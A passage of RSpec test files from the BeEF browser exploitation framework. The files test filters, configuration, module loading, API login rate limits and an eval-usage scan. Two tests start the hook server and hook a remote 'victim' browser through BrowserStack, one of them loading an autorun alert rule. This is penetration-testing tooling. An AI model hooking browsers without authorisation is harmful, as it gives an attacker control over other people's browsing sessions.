config.expect_with :rspec do |c| c.syntax = :expect end config.around do |example| ActiveRecord::Base.transaction do example.run raise ActiveRecord::Rollback end end def server_teardown(webdriver, server_pid, server_pids) webdriver.quit rescue StandardError => e print_info "Exception: #{e}" print_info "Exception Class: #{e.class}" print_info "Exception Message: #{e.message}" print_info "Exception Stack Trace: #{e.backtrace}" exit 0 ensure print_info 'Shutting down server' Process.kill('KILL', server_pid) Process.kill('KILL', server_pids) end end
Ruby
beef/spec/beef/filesystem_checks_spec.rb
RSpec.describe 'BeEF Filesystem' do def file_test(file) expect(File.file?(file)).to be(true) expect(File.zero?(file)).to be(false) end it 'required files' do files = [ 'beef', 'config.yaml', 'install' ] files.each do |f| file_test(f) end end it 'executable directories' do dirs = [ 'core', 'modules', 'extensions' ] dirs.each do |d| expect(File.executable?(d)).to be(true) end end end
Ruby
beef/spec/beef/security_checks_spec.rb
RSpec.describe 'BeEF Security Checks' do it 'dangerous eval usage' do Dir['**/*.rb'].each do |path| File.open(path) do |f| next if /#{File.basename(__FILE__)}/.match(path) # skip this file next if %r{/msf-test/}.match(path) # skip this file next if %r{extensions/dns}.match(path) # skip this file f.grep(/\Weval\W/im) do |line| raise "Illegal use of 'eval' found in\n Path: #{path}\nLine: #{line}" end end end end end
Ruby
beef/spec/beef/api/auth_rate_spec.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # RSpec.describe 'BeEF API Rate Limit' do before(:all) do @config = BeEF::Core::Configuration.instance @config.set('beef.credentials.user', "beef") @config.set('beef.credentials.passwd', "beef") @username = @config.get('beef.credentials.user') @password = @config.get('beef.credentials.passwd') # Load BeEF extensions and modules # Always load Extensions, as previous changes to the config from other tests may affect # whether or not this test passes. print_info "Loading in BeEF::Extensions" BeEF::Extensions.load sleep 2 # Check if modules already loaded. No need to reload. if @config.get('beef.module').nil? print_info "Loading in BeEF::Modules" BeEF::Modules.load sleep 2 else print_info "Modules already loaded" end # Grab DB file and regenerate if requested print_info "Loading database" db_file = @config.get('beef.database.file') if BeEF::Core::Console::CommandLine.parse[:resetdb] print_info 'Resetting the database for BeEF.' File.delete(db_file) if File.exist?(db_file) end # Load up DB and migrate if necessary ActiveRecord::Base.logger = nil OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')] OTR::ActiveRecord.configure_from_hash!(adapter:'sqlite3', database: db_file) # otr-activerecord require you to manually establish the connection with the following line #Also a check to confirm that the correct Gem version is installed to require it, likely easier for old systems. if Gem.loaded_specs['otr-activerecord'].version > Gem::Version.create('1.4.2') OTR::ActiveRecord.establish_connection! end context = ActiveRecord::Migration.new.migration_context if context.needs_migration? ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate end sleep 2 BeEF::Core::Migration.instance.update_db! # Spawn HTTP Server print_info "Starting HTTP Hook Server" http_hook_server = BeEF::Core::Server.instance http_hook_server.prepare # Generate a token for the server to respond with BeEF::Core::Crypto::api_token # Initiate server start-up @pids = fork do BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server) end @pid = fork do http_hook_server.start end # Give the server time to start-up sleep 1 # Authenticate to REST API & pull the token from the response @response = RestClient.post "#{RESTAPI_ADMIN}/login", { 'username': "#{@username}", 'password': "#{@password}" }.to_json, :content_type => :json @token = JSON.parse(@response)['token'] end after(:all) do print_info "Shutting down server" Process.kill("KILL",@pid) Process.kill("KILL",@pids) end it 'adheres to auth rate limits' do passwds = (1..9).map { |i| "broken_pass"} passwds.push BEEF_PASSWD apis = passwds.map { |pswd| BeefRestClient.new('http', ATTACK_DOMAIN, '3000', BEEF_USER, pswd) } l = apis.length #If this is failing with expect(test_api.auth()[:payload]["success"]).to be(true) expected true but received nil #make sure in config.yaml the password = BEEF_PASSWD, which is currently 'beef' (0..2).each do |again| # multiple sets of auth attempts # first pass -- apis in order, valid passwd on 9th attempt # subsequent passes apis shuffled puts "speed requesets" # all should return 401 (0..50).each do |i| # t = Time.now() #puts "#{i} : #{t - t0} : #{apis[i%l].auth()[:payload]}" test_api = apis[i%l] expect(test_api.auth()[:payload]).to eql("401 Unauthorized") # all (unless the valid is first 1 in 10 chance) # t0 = t end # again with more time between calls -- there should be success (1st iteration) puts "delayed requests" (0..(l*2)).each do |i| # t = Time.now() #puts "#{i} : #{t - t0} : #{apis[i%l].auth()[:payload]}" test_api = apis[i%l] if (test_api.is_pass?(BEEF_PASSWD)) expect(test_api.auth()[:payload]["success"]).to be(true) # valid pass should succeed else expect(test_api.auth()[:payload]).to eql("401 Unauthorized") end sleep(0.5) # t0 = t end apis.shuffle! # new order for next iteration apis = apis.reverse if (apis[0].is_pass?(BEEF_PASSWD)) # prevent the first from having valid passwd end # multiple sets of auth attempts end end
Ruby
beef/spec/beef/core/extensions_spec.rb
RSpec.describe 'BeEF Extensions' do it 'loaded successfully' do expect { BeEF::Extensions.load }.to_not raise_error exts = BeEF::Core::Configuration.instance.get('beef.extension').select{|k,v| v['enable'] } expect(exts.length).to be > 0 exts.each do |k,v| expect(v).to have_key('name') expect(v).to have_key('enable') expect(v).to have_key('loaded') expect(v['loaded']).to be(true) end end end
Ruby
beef/spec/beef/core/modules_spec.rb
RSpec.describe 'BeEF Modules' do it 'loaded successfully' do expect { BeEF::Modules.load }.to_not raise_error modules = BeEF::Core::Configuration.instance.get('beef.module').select do |k,v| v['enable'] == true and v['category'] != nil end expect(modules.length).to be > 0 modules.each do |k,v| expect(BeEF::Module.is_present(k)).to be(true) expect(BeEF::Module.is_enabled(k)).to be(true) expect { BeEF::Module.hard_load(k) }.to_not raise_error expect(BeEF::Module.is_loaded(k)).to be(true) BeEF::Core::Configuration.instance.get("beef.module.#{k}.target").each do |k,v| expect(v).to_not be_empty end end end it 'safe client debug log' do Dir['../../modules/**/*.js'].each do |path| next unless File.file?(path) File.open(path) do |f| f.grep(/\bconsole\.log\W*\(/m) do |line| fail "Function 'console.log' instead of 'beef.debug' inside\n Path: #{path}\nLine: #{line}" end end end end it 'safe variable decleration' do Dir['../../modules/**/*.js'].each do |path| next unless File.file?(path) File.open(path) do |f| f.grep(/\blet\W+[a-zA-Z0-9_\.]+\W*=/) do |line| fail "Variable declared with 'let' instead of 'var' inside\n Path: #{path}\nLine: #{line}" end end end end end
Ruby
beef/spec/beef/core/filter/filters_spec.rb
RSpec.describe 'BeEF Filters' do context 'is_non_empty_string?' do it 'nil' do expect(BeEF::Filters::is_non_empty_string?(nil)).to be(false) end it 'Integer' do expect(BeEF::Filters::is_non_empty_string?(1)).to be(false) end it 'Empty String' do expect(BeEF::Filters::is_non_empty_string?("")).to be(false) end it 'null' do expect(BeEF::Filters::is_non_empty_string?("\x00")).to be(true) end it 'First char is num' do expect(BeEF::Filters::is_non_empty_string?("0")).to be(true) end it 'First char is alpha' do expect(BeEF::Filters::is_non_empty_string?("A")).to be(true) end it 'Four num chars' do expect(BeEF::Filters::is_non_empty_string?("3333")).to be(true) end it 'Four num chars begining with alpha' do expect(BeEF::Filters::is_non_empty_string?("A3333")).to be(true) end it 'Four num chars begining with null' do expect(BeEF::Filters::is_non_empty_string?("\x003333")).to be(true) end end context 'only?' do it 'success' do expect(BeEF::Filters::only?('A', 'A')).to be(true) end it 'fail' do expect(BeEF::Filters::only?('A', 'B')).to be(false) end end context 'exists?' do it 'success' do expect(BeEF::Filters::exists?('A', 'A')).to be(true) end it 'fail' do expect(BeEF::Filters::exists?('A', 'B')).to be(false) end end context 'has_null?' do context 'false with' do it 'general' do chars = [nil, "", "\x01", "\xFF", "A", "A3333", "0", "}", ".", "+", "-", "-1", "0.A", "3333", "33 33", " AAAAA", "AAAAAA "] chars.each do |c| expect(BeEF::Filters::has_null?(c)).to be(false) end end it 'alphabet' do (1..255).each do |c| str = '' str.concat(c) expect(BeEF::Filters::has_null?(str)).to be(false) end end end context 'true with' do it 'general' do chars = ["\x00", "A\x00", "AAAAAA\x00", "\x00A", "\x00AAAAAAAA", "A\x00A", "AAAAA\x00AAAA", "A\n\r\x00", "\x00\n\rA", "A\n\r\x00\n\rA", "\tA\x00A"] chars.each do |c| expect(BeEF::Filters::has_null?(c)).to be(true) end end it 'alphabet null after' do (1..255).each do |c| str = '' str.concat(c) str += "\x00" expect(BeEF::Filters::has_null?(str)).to be(true) end end it 'alphabet null before' do (1..255).each do |c| str = "\x00" str.concat(c) expect(BeEF::Filters::has_null?(str)).to be(true) end end end end context 'has_non_printable_char?' do context 'false with' do it 'general' do chars = [nil, "", "A", "A3333", "0", "}", ".", "+", "-", "-1", "0.A", "3333", " 0AAAAA", " 0AAA "] chars.each do |c| expect(BeEF::Filters::has_non_printable_char?(c)).to be(false) end end it 'lowercase' do ('a'..'z').each do |c| expect(BeEF::Filters::has_non_printable_char?(c)).to be(false) end end it 'uppercase' do ('A'..'Z').each do |c| expect(BeEF::Filters::has_non_printable_char?(c)).to be(false) end end it 'numbers' do ('0'..'9').each do |c| expect(BeEF::Filters::has_non_printable_char?(c)).to be(false) end end end context 'true with' do it 'general' do chars = ["\x00", "\x01", "\x02", "A\x03", "\x04A", "\x0033333", "\x00AAAAAA", " AAAAA\x00", "\t\x00AAAAA", "\n\x00AAAAA", "\n\r\x00AAAAAAAAA", "AAAAAAA\x00AAAAAAA", "\n\x00"] chars.each do |c| expect(BeEF::Filters::has_non_printable_char?(c)).to be(true) end end it 'alphabet null before' do (1..255).each do |c| str = '' str.concat(c) str += "\x00" expect(BeEF::Filters::has_non_printable_char?(str)).to be(true) end end end end context 'nums_only?' do it 'false with general' do chars = [nil, 1, "", "A", "A3333", "\x003333", "}", ".", "+", "-", "-1"] chars.each do |c| expect(BeEF::Filters::nums_only?(c)).to be(false) end end it 'true with general' do chars = ["0", "333"] chars.each do |c| expect(BeEF::Filters::nums_only?(c)).to be(true) end end end context 'is_valid_float?' do it 'false with general' do chars = [nil, 1, "", "A", "A3333", "\x003333", "}", ".", "+", "-", "-1", "0", "333", "0.A"] chars.each do |c| expect(BeEF::Filters::is_valid_float?(c)).to be(false) end end it 'true with general' do chars = ["33.33", "0.0", "1.0", "0.1"] chars.each do |c| expect(BeEF::Filters::is_valid_float?(c)).to be(true) end end end context 'hexs_only?' do it 'false with general' do chars = [nil, 1, "", "\x003333", "}", ".", "+", "-", "-1", "0.A", "33.33", "0.0", "1.0", "0.1"] chars.each do |c| expect(BeEF::Filters::hexs_only?(c)).to be(false) end end it 'true with general' do chars = ["0123456789ABCDEFabcdef", "0", "333", "A33333", "A"] chars.each do |c| expect(BeEF::Filters::hexs_only?(c)).to be(true) end end end context 'first_char_is_num?' do it 'false with general' do chars = ["", "A", "A33333", "\x0033333"] chars.each do |c| expect(BeEF::Filters::first_char_is_num?(c)).to be(false) end end it 'true with general' do chars = ["333", "0AAAAAA", "0"] chars.each do |c| expect(BeEF::Filters::first_char_is_num?(c)).to be(true) end end end context 'has_whitespace_char?' do it 'false with general' do chars = ["", "A", "A33333", "\x0033333", "0", "}", ".", "+", "-", "-1", "0.A"] chars.each do |c| expect(BeEF::Filters::has_whitespace_char?(c)).to be(false) end end it 'true with general' do chars = ["33 33", " ", " ", " 0AAAAAAA", " 0AAAAAAA ", "\t0AAAAAAA", "\n0AAAAAAAA"] chars.each do |c| expect(BeEF::Filters::has_whitespace_char?(c)).to be(true) end end end context 'alphanums_only?' do context 'false with' do it 'general' do chars = [nil, "", "\n", "\r", "\x01", "}", ".", "+", "-", "-1", "ee-!@$%^&*}=0.A", "33 33", " AAAA", "AAA "] chars.each do |c| expect(BeEF::Filters::alphanums_only?(c)).to be(false) end end it 'additional nulls' do chars = ["\x00", "A\x00", "AAAAAAAAA\x00", "\x00A", "\x00AAAAAAAAA", "A\x00A", "AAAAAAAA\x00AAAAAAAA", "A\n\r\x00", "\x00\n\rA", "A\n\r\x00\n\rA", "\tA\x00A"] chars.each do |c| expect(BeEF::Filters::alphanums_only?(c)).to be(false) end end it 'alphabet null after' do (1..255).each do |c| str = '' str.concat(c) str += "\x00" expect(BeEF::Filters::alphanums_only?(str)).to be(false) end end it 'alphabet null before' do (1..255).each do |c| str = "\x00" str.concat(c) expect(BeEF::Filters::alphanums_only?(str)).to be(false) end end it 'alphabet around null' do (1..255).each do |c| str = '' str.concat(c) str += "\x00" str.concat(c) expect(BeEF::Filters::alphanums_only?(str)).to be(false) end end end context 'true with' do it 'general' do chars = ["A", "A3333", "0", "3333"] chars.each do |c| expect(BeEF::Filters::alphanums_only?(c)).to be(true) end end it 'uppercase' do ('A'..'Z').each do |c| expect(BeEF::Filters::alphanums_only?(c)).to be(true) end end it 'lowercase' do ('a'..'z').each do |c| expect(BeEF::Filters::alphanums_only?(c)).to be(true) end end it 'numbers' do ('0'..'9').each do |c| expect(BeEF::Filters::alphanums_only?(c)).to be(true) end end end end context 'has_valid_param_chars?' do it 'false' do chars = [nil, "", "+"] chars.each do |c| expect(BeEF::Filters::has_valid_param_chars?(c)).to be(false) end end it 'true' do expect(BeEF::Filters::has_valid_param_chars?("A")).to be(true) end end end
Ruby
beef/spec/beef/core/main/command_spec.rb
RSpec.describe 'BeEF Command class testing' do xit 'should return a beef configuration variable' do BeEF::Modules.load command_mock = BeEF::Core::Command.new('test_get_variable') expect(command_mock.config.beef_host).to eq('0.0.0.0') require 'modules/browser/hooked_domain/get_page_links/module' gpl = Get_page_links.new('test_get_variable') expect(gpl.config.beef_host).to eq('0.0.0.0') end end
Ruby
beef/spec/beef/core/main/configuration_spec.rb
RSpec.configure do |config| end RSpec.describe 'BeEF Configuration' do before(:context, :type => :old ) do config = File.expand_path('../../../support/assets/config_old.yaml', __dir__) @config_instance = BeEF::Core::Configuration.new(config) end before(:context) do @config_instance = BeEF::Core::Configuration.instance end context 'configuration validation', :type => :old do it 'should error when using hold public config' do @config_instance.set('beef.http.public', 'example.com') expect(@config_instance.validate).to eq(nil) end it 'should error when using old public_port config' do @config_instance.set('beef.http.public_port', 443) expect(@config_instance.validate).to eq(nil) end end context 'http local host configuration values' do it 'should set the local host value to 0.0.0.0' do @config_instance.set('beef.http.host', '0.0.0.0') expect(@config_instance.get('beef.http.host')).to eq('0.0.0.0') end it 'should get the local host value' do @config_instance.set('beef.http.host', '0.0.0.0') expect(@config_instance.local_host).to eq('0.0.0.0') end it 'should get the default host value' do @config_instance.set('beef.http.host', nil) expect(@config_instance.get('beef.http.host')).to eq(nil) expect(@config_instance.local_host).to eq('0.0.0.0') end end context 'http local port configuration values' do it 'should set the local port value to 3000' do @config_instance.set('beef.http.port', '3000') expect(@config_instance.get('beef.http.port')).to eq('3000') end it 'should get the local port value' do @config_instance.set('beef.http.port', '3000') expect(@config_instance.local_port).to eq('3000') end it 'should get the default port value' do @config_instance.set('beef.http.port', nil) expect(@config_instance.get('beef.http.port')).to eq(nil) expect(@config_instance.local_port).to eq('3000') end end context 'beef https enabled configuration values' do it 'should set the https enabled config value' do @config_instance.set('beef.http.https.enable', true) expect(@config_instance.get('beef.http.https.enable')).to eq(true) end it 'should get https enabled value set to true' do @config_instance.set('beef.http.https.enable', true) expect(@config_instance.local_https_enabled).to eq(true) end it 'should get https enabled value set to false' do @config_instance.set('beef.http.https.enable', false) expect(@config_instance.local_https_enabled).to eq(false) end it 'should get the default https enabled value' do @config_instance.set('beef.http.https.enable', nil) expect(@config_instance.get('beef.http.https.enable')).to eq(nil) expect(@config_instance.local_https_enabled).to eq(false) end end #public context 'http public host configuration values' do it 'should set the public host value to example.com' do @config_instance.set('beef.http.public.host', 'example.com') expect(@config_instance.get('beef.http.public.host')).to eq('example.com') end it 'should get the public host value' do @config_instance.set('beef.http.public.host', 'example.com') expect(@config_instance.public_host).to eq('example.com') end it 'should get nil host value' do @config_instance.set('beef.http.public.host', nil) expect(@config_instance.get('beef.http.public.host')).to eq(nil) expect(@config_instance.public_host).to eq(nil) end end context 'http public port configuration values' do it 'should set the public port value to 3000' do @config_instance.set('beef.http.public.port', '443') expect(@config_instance.get('beef.http.public.port')).to eq('443') end it 'should get the public port value' do @config_instance.set('beef.http.public.port', '3000') expect(@config_instance.public_port).to eq('3000') end it 'should return 80 as the port given a public host has been set and https disabled' do @config_instance.set('beef.http.public.port', nil) @config_instance.set('beef.http.public.host', 'example.com') @config_instance.set('beef.http.public.https', false) expect(@config_instance.get('beef.http.public.port')).to eq(nil) expect(@config_instance.get('beef.http.public.host')).to eq('example.com') expect(@config_instance.public_port).to eq('80') end end context 'beef https enabled configuration values' do it 'should set the https enabled config value' do @config_instance.set('beef.http.https.enable', true) expect(@config_instance.get('beef.http.https.enable')).to eq(true) end it 'should get https enabled value set to true' do @config_instance.set('beef.http.public.https', true) expect(@config_instance.public_https_enabled?).to eq(true) end it 'should get https enabled value set to false' do @config_instance.set('beef.http.public.https', false) expect(@config_instance.public_https_enabled?).to eq(false) end it 'should get the default https to false' do @config_instance.set('beef.http.public.https', nil) expect(@config_instance.get('beef.http.public.https')).to eq(nil) expect(@config_instance.public_https_enabled?).to eq(false) end it 'should return public port as 443 if public https is enabled' do @config_instance.set('beef.http.public.https', true) @config_instance.set('beef.http.public.port', nil) expect(@config_instance.get('beef.http.public.https')).to eq(true) expect(@config_instance.get('beef.http.public.port')).to eq(nil) expect(@config_instance.public_https_enabled?).to eq(true) expect(@config_instance.public_port).to eq('443') end end context 'beef hosting information' do it 'should return the local host value because a public has not been set' do @config_instance.set('beef.http.host', 'asdqwe') @config_instance.set('beef.http.public.host', nil) expect(@config_instance.get('beef.http.host')).to eq('asdqwe') expect(@config_instance.get('beef.http.public.host')).to eq(nil) expect(@config_instance.beef_host).to eq('asdqwe') end it 'should return the public host value because a public has been set' do @config_instance.set('beef.http.host', 'asdqwe') @config_instance.set('beef.http.public.host', 'poilkj') expect(@config_instance.get('beef.http.host')).to eq('asdqwe') expect(@config_instance.get('beef.http.public.host')).to eq('poilkj') expect(@config_instance.beef_host).to eq('poilkj') end it 'should return the local port value because a public value has not been set' do @config_instance.set('beef.http.port', '3000') @config_instance.set('beef.http.public.host', nil) @config_instance.set('beef.http.public.port', nil) @config_instance.set('beef.http.public.https', nil) expect(@config_instance.get('beef.http.port')).to eq('3000') expect(@config_instance.get('beef.http.public.port')).to eq(nil) expect(@config_instance.get('beef.http.public.host')).to eq(nil) expect(@config_instance.get('beef.http.public.https')).to eq(nil) expect(@config_instance.beef_port).to eq('3000') end it 'should return the public host value because a public has been set' do @config_instance.set('beef.http.port', '3000') @config_instance.set('beef.http.public.port', '80') @config_instance.set('beef.http.public.host', nil) expect(@config_instance.get('beef.http.port')).to eq('3000') expect(@config_instance.get('beef.http.public.port')).to eq('80') expect(@config_instance.get('beef.http.public.host')).to eq(nil) expect(@config_instance.beef_port).to eq('80') end it 'should return a protocol https if https public has been enabled and public host is set' do @config_instance.set('beef.http.public.https', true) @config_instance.set('beef.http.public.host', 'public') expect(@config_instance.get('beef.http.public.https')).to eq(true) expect(@config_instance.beef_proto).to eq('https') end it 'should return a protocol http if public is not set and https local is fales' do @config_instance.set('beef.http.public.https', false) @config_instance.set('beef.http.https.enable', false) expect(@config_instance.get('beef.http.public.https')).to eq(false) expect(@config_instance.beef_proto).to eq('http') end it 'should return the full url string for beef local http and port 80' do @config_instance.set('beef.http.host', 'localhost') @config_instance.set('beef.http.port', '80') @config_instance.set('beef.http.https.enable', false) @config_instance.set('beef.http.public.https', false) @config_instance.set('beef.http.public.host', nil) @config_instance.set('beef.http.public.port', nil) expect(@config_instance.get('beef.http.host')).to eq('localhost') expect(@config_instance.get('beef.http.port')).to eq('80') expect(@config_instance.get('beef.http.https.enable')).to eq(false) expect(@config_instance.get('beef.http.public.https')).to eq(false) expect(@config_instance.beef_url_str).to eq('http://localhost:80') end it 'should return the full url string for beef https localhost 3000 default' do @config_instance.set('beef.http.host', 'localhost') @config_instance.set('beef.http.port', nil) @config_instance.set('beef.http.https.enable', true) @config_instance.set('beef.http.public.host', nil) @config_instance.set('beef.http.public.https', false) @config_instance.set('beef.http.public.host', nil) @config_instance.set('beef.http.public.port', nil) expect(@config_instance.get('beef.http.host')).to eq('localhost') expect(@config_instance.get('beef.http.port')).to eq(nil) expect(@config_instance.get('beef.http.https.enable')).to eq(true) expect(@config_instance.get('beef.http.public.https')).to eq(false) expect(@config_instance.beef_url_str).to eq('https://localhost:3000') end it 'should return the full url string for beef hook url' do @config_instance.set('beef.http.host', 'localhost') @config_instance.set('beef.http.port', nil) @config_instance.set('beef.http.https.enable', true) @config_instance.set('beef.http.public.https', false) @config_instance.set('beef.http.public.host', nil) @config_instance.set('beef.http.public.port', nil) @config_instance.set('beef.http.hook_file', '/hook.js') expect(@config_instance.get('beef.http.host')).to eq('localhost') expect(@config_instance.get('beef.http.port')).to eq(nil) expect(@config_instance.get('beef.http.https.enable')).to eq(true) expect(@config_instance.get('beef.http.public.https')).to eq(false) expect(@config_instance.get('beef.http.hook_file')).to eq('/hook.js') expect(@config_instance.beef_url_str).to eq('https://localhost:3000') expect(@config_instance.hook_url).to eq('https://localhost:3000/hook.js') end end end
Ruby
beef/spec/beef/core/main/autorun_engine/autorun_engine_spec.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # require 'rest-client' require 'json' require_relative '../../../../spec_helper' require_relative '../../../../support/constants' require_relative '../../../../support/beef_test' RSpec.describe 'AutoRunEngine Test', run_on_browserstack: true do before(:all) do @config = BeEF::Core::Configuration.instance # Grab DB file and regenerate if requested print_info 'Loading database' db_file = @config.get('beef.database.file') print_info 'Resetting the database for BeEF.' File.delete(db_file) if File.exist?(db_file) @config.set('beef.credentials.user', 'beef') @config.set('beef.credentials.passwd', 'beef') @username = @config.get('beef.credentials.user') @password = @config.get('beef.credentials.passwd') # Load BeEF extensions and modules # Always load Extensions, as previous changes to the config from other tests may affect # whether or not this test passes. print_info 'Loading in BeEF::Extensions' BeEF::Extensions.load # Check if modules already loaded. No need to reload. if @config.get('beef.module').nil? print_info 'Loading in BeEF::Modules' BeEF::Modules.load else print_info 'Modules already loaded' end # Load up DB and migrate if necessary ActiveRecord::Base.logger = nil OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')] OTR::ActiveRecord.configure_from_hash!(adapter: 'sqlite3', database: db_file) # otr-activerecord require you to manually establish the connection with the following line #Also a check to confirm that the correct Gem version is installed to require it, likely easier for old systems. if Gem.loaded_specs['otr-activerecord'].version > Gem::Version.create('1.4.2') OTR::ActiveRecord.establish_connection! end context = ActiveRecord::Migration.new.migration_context ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate if context.needs_migration? BeEF::Core::Migration.instance.update_db! # add AutoRunEngine rule test_rule = { 'name' => 'Display an alert', 'author' => 'mgeeky', 'browser' => 'ALL', 'browser_version' => 'ALL', 'os' => 'ALL', 'os_version' => 'ALL', 'modules' => [{ 'name' => 'alert_dialog', 'condition' => nil, 'options' => { 'text' => "You've been BeEFed ;>" } }], 'execution_order' => [0], 'execution_delay' => [0], 'chain_mode' => 'sequential' } BeEF::Core::AutorunEngine::RuleLoader.instance.load_directory # are_engine.R # Spawn HTTP Server print_info 'Starting HTTP Hook Server' http_hook_server = BeEF::Core::Server.instance http_hook_server.prepare # Generate a token for the server to respond with @token = BeEF::Core::Crypto.api_token # Initiate server start-up @pids = fork do BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server) end @pid = fork do http_hook_server.start end begin @caps = CONFIG['common_caps'].merge(CONFIG['browser_caps'][TASK_ID]) @caps['name'] = self.class.description || ENV['name'] || 'no-name' @caps['browserstack.local'] = true @caps['browserstack.localIdentifier'] = ENV['BROWSERSTACK_LOCAL_IDENTIFIER'] @driver = Selenium::WebDriver.for(:remote, url: "http://#{CONFIG['user']}:#{CONFIG['key']}@#{CONFIG['server']}/wd/hub", desired_capabilities: @caps) # Hook new victim print_info 'Hooking a new victim, waiting a few seconds...' wait = Selenium::WebDriver::Wait.new(timeout: 30) # seconds @driver.navigate.to VICTIM_URL.to_s sleep 1 sleep 1 until wait.until { @driver.execute_script('return window.beef.session.get_hook_session_id().length') > 0 } @session = @driver.execute_script('return window.beef.session.get_hook_session_id()') rescue StandardError => e print_info "Exception: #{e}" print_info "Exception Class: #{e.class}" print_info "Exception Message: #{e.message}" print_info "Exception Stack Trace: #{e.backtrace}" if @driver.execute_script('return window.beef.session.get_hook_session_id().length').nil? exit 1 else exit 0 end end end after(:all) do server_teardown(@driver, @pid, @pids) end it 'AutoRunEngine is working' do expect(@session).not_to be_nil rescue StandardError => e print_info "Exception: #{e}" print_info "Exception Class: #{e.class}" print_info "Exception Message: #{e.message}" print_info "Exception Stack Trace: #{e.backtrace}" if @driver.execute_script('return window.beef.session.get_hook_session_id().length').nil? exit 1 else expect(BeEF::Filters.is_valid_hook_session_id?(@driver.execute_script('return window.beef.session.get_hook_session_id()'))).to eq true end end end
Ruby
beef/spec/beef/core/main/handlers/browser_details_handler_spec.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # require 'rest-client' require 'json' require_relative '../../../../spec_helper' require_relative '../../../../support/constants' require_relative '../../../../support/beef_test' RSpec.describe 'Browser Details Handler', run_on_browserstack: true do before(:all) do @config = BeEF::Core::Configuration.instance db_file = @config.get('beef.database.file') print_info 'Resetting the database for BeEF.' File.delete(db_file) if File.exist?(db_file) @config.set('beef.credentials.user', 'beef') @config.set('beef.credentials.passwd', 'beef') @username = @config.get('beef.credentials.user') @password = @config.get('beef.credentials.passwd') # Load BeEF extensions and modules # Always load Extensions, as previous changes to the config from other tests may affect # whether or not this test passes. print_info 'Loading in BeEF::Extensions' BeEF::Extensions.load # Check if modules already loaded. No need to reload. if @config.get('beef.module').nil? print_info 'Loading in BeEF::Modules' BeEF::Modules.load else print_info 'Modules already loaded' end # Grab DB file and regenerate if requested print_info 'Loading database' # Load up DB and migrate if necessary ActiveRecord::Base.logger = nil OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')] OTR::ActiveRecord.configure_from_hash!(adapter: 'sqlite3', database: db_file) # otr-activerecord require you to manually establish the connection with the following line #Also a check to confirm that the correct Gem version is installed to require it, likely easier for old systems. if Gem.loaded_specs['otr-activerecord'].version > Gem::Version.create('1.4.2') OTR::ActiveRecord.establish_connection! end context = ActiveRecord::Migration.new.migration_context ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate if context.needs_migration? BeEF::Core::Migration.instance.update_db! # Spawn HTTP Server print_info 'Starting HTTP Hook Server' http_hook_server = BeEF::Core::Server.instance http_hook_server.prepare # Generate a token for the server to respond with @token = BeEF::Core::Crypto.api_token # Initiate server start-up @pids = fork do BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server) end @pid = fork do http_hook_server.start end begin @caps = CONFIG['common_caps'].merge(CONFIG['browser_caps'][TASK_ID]) @caps['name'] = self.class.description || ENV['name'] || 'no-name' @caps['browserstack.local'] = true @caps['browserstack.video'] = true @caps['browserstack.localIdentifier'] = ENV['BROWSERSTACK_LOCAL_IDENTIFIER'] @driver = Selenium::WebDriver.for(:remote, url: "http://#{CONFIG['user']}:#{CONFIG['key']}@#{CONFIG['server']}/wd/hub", desired_capabilities: @caps) # Hook new victim print_info 'Hooking a new victim, waiting a few seconds...' wait = Selenium::WebDriver::Wait.new(timeout: 30) # seconds @driver.navigate.to VICTIM_URL.to_s sleep 3 sleep 1 until wait.until { @driver.execute_script('return window.beef.session.get_hook_session_id().length') > 0 } @session = @driver.execute_script('return window.beef.session.get_hook_session_id()') rescue StandardError => e print_info "Exception: #{e}" print_info "Exception Class: #{e.class}" print_info "Exception Message: #{e.message}" if @driver.execute_script('return window.beef.session.get_hook_session_id().length').nil? exit 1 else exit 0 end end end after(:all) do server_teardown(@driver, @pid, @pids) end it 'can successfully hook a browser' do expect(@session).not_to be_nil rescue StandardError => e print_info "Exception: #{e}" print_info "Exception Class: #{e.class}" print_info "Exception Message: #{e.message}" print_info "Exception Stack Trace: #{e.backtrace}" if @driver.execute_script('return window.beef.session.get_hook_session_id().length').nil? exit 1 else expect(BeEF::Filters.is_valid_hook_session_id?(@driver.execute_script('return window.beef.session.get_hook_session_id()'))).to eq true end end it 'browser details handler working' do print_info 'Getting browser details' hooked_browser = BeEF::Core::Models::HookedBrowser.all.first details = JSON.parse(RestClient.get("#{RESTAPI_HOOKS}/#{hooked_browser.session}?token=#{@token}")) browser_name = if details['browser.name.friendly'].downcase == 'internet explorer' 'internet_explorer' else details['browser.name.friendly'].downcase end expect(@driver.browser.to_s.downcase).to eq(browser_name) rescue StandardError => e print_info "Exception: #{e}" print_info "Exception Class: #{e.class}" print_info "Exception Message: #{e.message}" print_info "Exception Stack Trace: #{e.backtrace.each { |stack| puts stack }}" exit 0 end end
Ruby
beef/spec/beef/core/main/models/browser_details_spec.rb
